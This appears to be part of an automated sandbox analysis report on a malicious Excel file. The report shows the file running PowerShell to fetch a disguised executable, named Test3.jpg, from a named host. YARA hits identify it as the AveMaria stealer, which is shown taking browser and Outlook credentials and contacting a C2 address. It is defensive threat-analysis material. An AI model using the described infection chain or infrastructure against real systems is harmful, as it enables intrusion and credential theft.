        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings:

        Increases the number of concurrent connection per server for Internet Explorer
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

        Stealing of Sensitive Information:

        Yara detected AveMaria stealer
        Source: Yara match | File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Yara detected Generic Dropper
        Source: Yara match | File source: Process Memory Space: Test3.jpg PID: 5940, type: MEMORY
        Source: Yara match | File source: Process Memory Space: Test3.jpg PID: 6852, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Tries to steal Mail credentials (via file access)
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: Yara match | File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: Test3.jpg PID: 5940, type: MEMORY
        Source: Yara match | File source: Process Memory Space: Test3.jpg PID: 6852, type: MEMORY
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        Yara detected AveMaria stealer
        Source: Yara match | File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation 21 | LSASS Driver 1 | LSASS Driver 1 | Disable or Modify Tools 2 | OS Credential Dumping 1 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Endpoint Denial of Service 1
        Default Accounts | Scripting 11 | DLL Side-Loading 1 | DLL Side-Loading 1 | Scripting 11 | Input Capture 121 | System Information Discovery 16 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Exploitation for Client Execution 13 | Windows Service 2 | Windows Service 2 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | PowerShell 2 | Logon Script (Mac) | Process Injection 412 | Software Packing 23 | NTDS | Security Software Discovery 111 | Distributed Component Object Model | Input Capture 121 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Virtualization/Sandbox Evasion 4 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 12 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 13 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 4 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 412 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Users 2 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

        Behavior Graph

        Behavior Graph ID: 337287 | Sample: Telex06012020.xls | Start date: 08/01/2021 | Architecture: WINDOWS | Score: 100
        Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 13 other signatures

        Process tree as shown in the graph (edges are "started" relations):
        EXCEL.EXE [Document exploit detected (process start blacklist hit); PowerShell case anomaly found]
          -> cmd.exe [PowerShell case anomaly found]
             -> conhost.exe
             -> powershell.exe [contacts lankarecipes.com 192.185.236.165 port 80 (local port 49728), UNIFIEDLAYER-AS-1US United States; drops C:\Users\user\AppData\Local\Temp\Test1.txt (PE32) and C:\Users\user\AppData\...\mvqape5o.cmdline (UTF-8); Powershell drops PE file]
                -> cmd.exe -> WMIC.exe [Creates processes via WMI]
                -> cmd.exe [drops C:\Users\user\AppData\Local\Temp\Test3.jpg (PE32)]
                -> csc.exe [drops C:\Users\user\AppData\Local\...\mvqape5o.dll (PE32)] -> cvtres.exe
        Test3.jpg [Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 2 other signatures]
          -> Test3.jpg [connects to 37.46.150.86 port 5200 (local port 49747), IWAYCH Moldova Republic of; drops C:\Program Files\Microsoft DN1\sqlmap.dll (PE32+); Hides user accounts; Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); 7 other signatures]
             -> powershell.exe -> conhost.exe
             -> cmd.exe -> conhost.exe
        rdpvideominiport.sys and 2 other processes are also started from the root node.


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        Telex06012020.xls | 12% | Virustotal |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\Test3.jpg | 100% | Avira | TR/Redcap.ghjpt
        C:\Users\user\AppData\Local\Temp\Test1.txt | 100% | Avira | TR/Redcap.ghjpt
        C:\Users\user\AppData\Local\Temp\Test3.jpg | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\Test1.txt | 100% | Joe Sandbox ML |
        C:\Program Files\Microsoft DN1\sqlmap.dll | 22% | Metadefender |
        C:\Program Files\Microsoft DN1\sqlmap.dll | 41% | ReversingLabs | Win64.Trojan.RDPWrap

        Unpacked PE Files

        Source | Detection | Scanner | Label
        19.1.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Redcap.ghjpt
        18.2.Test3.jpg.2ae0000.1.unpack | 100% | Avira | TR/Redcap.ghjpt
        19.0.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Redcap.ghjpt
        22.2.cmd.exe.5250000.1.unpack | 100% | Avira | TR/Dropper.Gen
        18.0.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Redcap.ghjpt
        18.2.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Redcap.ghjpt
        19.2.Test3.jpg.400000.0.unpack | 100% | Avira | TR/Redcap.ghjpt

        Domains

        No Antivirus matches

        URLs

        | Source | Detection | Scanner | Label |
        |---|---|---|---|
        | https://cdn.entity. | 0% | URL Reputation | safe |
        | https://wus2-000.contentsync. | 0% | URL Reputation | safe |
        | https://powerlift.acompli.net | 0% | URL Reputation | safe |
        | https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
        | https://cortana.ai | 0% | URL Reputation | safe |
        | https://api.aadrm.com/ | 0% | URL Reputation | safe |
